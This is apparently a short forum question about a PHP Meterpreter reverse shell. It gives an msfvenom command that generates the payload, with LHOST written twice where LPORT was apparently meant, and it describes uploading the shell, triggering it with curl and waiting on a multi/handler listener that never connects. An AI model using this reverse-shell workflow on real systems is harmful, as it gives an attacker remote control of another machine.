I created a php reverse shell using msfvenom utility like:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<MY_IP> LHOST=4444 -f raw > reverse_shell.php
And I created a listener using msfconsole using multi/handler
. I uploaded the shell to the target machine and used curl
to request the url of the uploaded shell but the listener is not showing any response. Any suggestions?